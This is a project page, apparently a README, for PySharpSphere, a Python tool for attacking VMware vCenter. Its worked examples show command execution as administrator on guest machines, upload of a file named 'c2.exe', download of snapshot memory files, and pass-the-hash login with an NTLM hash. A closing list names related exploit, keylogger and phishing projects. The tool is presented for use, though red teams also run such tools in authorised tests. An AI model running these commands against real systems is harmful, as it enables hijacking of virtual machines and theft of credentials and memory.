PySharpSphere

Inspired by SharpSphere, just another python version.

Installation

python3 setup.py install

Features

Support control both Linux and Windows system of virtual machines
Execute commands, upload files and dump memory on target guest OS
Use NTLM token to execute commands on guest Windows system

SharpSphere Guide

PySharpSphere Usage

usage: pySharpSphere [-h] [-H HOST] [-P PORT] [-u USER] [-p PASSWORD]
                     [-c CERT] [-k KEY] [-d DOMAIN]
                     {list,execute,upload,dump} ...

positional arguments:
  {list,execute,upload,dump}
                        sub-command
    list                list virtual machines
    execute             execute command on target machine
    upload              upload file to target machine
    dump                dump memory of target machine

optional arguments:
  -h, --help            show this help message and exit
  -H HOST, --host HOST  vCenter Server host
  -P PORT, --port PORT  vCenter Server port
  -u USER, --username USER
                        vCenter Server username
  -p PASSWORD, --password PASSWORD
                        vCenter Server password

0. List virtual machines

$ pysharpsphere -H 192.168.100.49 -u [email protected] -p password list
[*] Retrieve virtual machines list ...
DataCenter    MoID     Name                           Power    OS                                         Tools         IP
------------  -------  -----------------------------  -------  -----------------------------------------  ------------  --------------
Datacenter    vm-1015  Windows Server 2012 (VC67)     Off      Microsoft Windows Server 2012 (64-bit)     Current
Datacenter    vm-1030  VMware vCenter Server 7.0U2b   On       Other 3.x or later Linux (64-bit)          Unmanaged     192.168.100.49
Datacenter    vm-1017  VMware vCenter Server 6.7U3l   Off      Other 3.x or later Linux (64-bit)          Unmanaged
Datacenter    vm-1020  Operation Machine (Windows 7)  On       Microsoft Windows 7 (64-bit)               Current       192.168.100.2

1. Execute commands on guest OS

$ pysharpsphere -H 192.168.100.49 -u [email protected] -p password execute -t vm-1020 --guest-user administrator --guest-pass guestpassword -c whoami
[*] Execute command on target virtual machine ...
[*] Retrieve virtual machines list ...
[*] Target OS is Windows, using C:\Windows\system32\cmd.exe to execute command ...
[+] Process start successfully with PID 1200
[*] Program exited, retrieving output ...
[*] Command output:
operation-machi\administrator

2. Upload file to target virtual machine

$ pysharpsphere -H 192.168.100.49 -u [email protected] -p password upload -t vm-1020 --guest-user administrator --guest-pass guestpassword --source /tmp/test.exe --dest C:\\c2.exe
[*] Retrieve virtual machines list ...
[*] Uploading file to VM 'vim.VirtualMachine:vm-1020' ...
[*] Sending file data ...
[+] Uploaded file to C:\c2.exe successfully

3. Dump memory of guest OS

$ pysharpsphere -H 192.168.100.49 -u [email protected] -p password dump -t vm-1020
[*] Retrieve virtual machines list ...
[*] Finding snapshot on target machine vm-1020
[+] Found exists snapshot!
[*] Finding snapshot files ...
[*] Downloading .vmsn file ...
[+] Downloaded successfully: Ubuntu-Snapshot1.vmsn
[*] Downloading .vmem file ...
[+] Downloaded successfully: Ubuntu-Snapshot1.vmem

4. Execute commands on guest OS using NTLM

$ pysharpsphere -H 192.168.100.49 -u [email protected] -p password execute -t vm-1015 --guest-user administrator --guest-ntlm ea41383fa39c20f186cbcdc0ac234417 -c whoami
[*] Execute command on target virtual machine ...
[*] Retrieve virtual machines list ...
[*] Target OS is Windows, using C:\Windows\system32\cmd.exe to execute command ...
[*] Starting NTLM authentication ...
[+] Process start successfully with PID 2624
[*] Program exited, retrieving output ...
[*] Command output:
win-i1el8084mf0\administrator

PySharpSphere - Inspired by SharpSphere, just another python version

Related tags

Overview

PySharpSphere

Installation

Features

SharpSphere Guide

PySharpSphere Usage

Owner

Ricter Zheng

This little tool is to calculate a MurmurHash value of a favicon to hunt phishing websites on the Shodan platform.

Log4j2 intranet scan

vulnerable APIs

Polkit - Local Privilege Escalation (CVE-2021-3560)

Scarecrow is a tool written in Python3 allowing you to protect your Python3 scripts.

Xteam All in one Instagram,Android,phishing osint and wifi hacking tool available

Metal Gear Online 2 (MGO2) stage files decryption

PoC encrypted diary in Python 3

Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.

A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye

Python tool for enumerating directories and for fuzzing

Privacy-respecting metasearch engine

simple python keylogger

WinRemoteEnum is a module-based collection of operations achievable by a low-privileged domain user.

Kriecher is a simple Web Scanner which will run it's own checks for the OWASP

Log4j rce test environment and poc

A Modified version of TCC's Osprey poc framework......

Gitlab RCE - Remote Code Execution

A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability

Receive notifications/alerts on the most recent disclosed CVE's.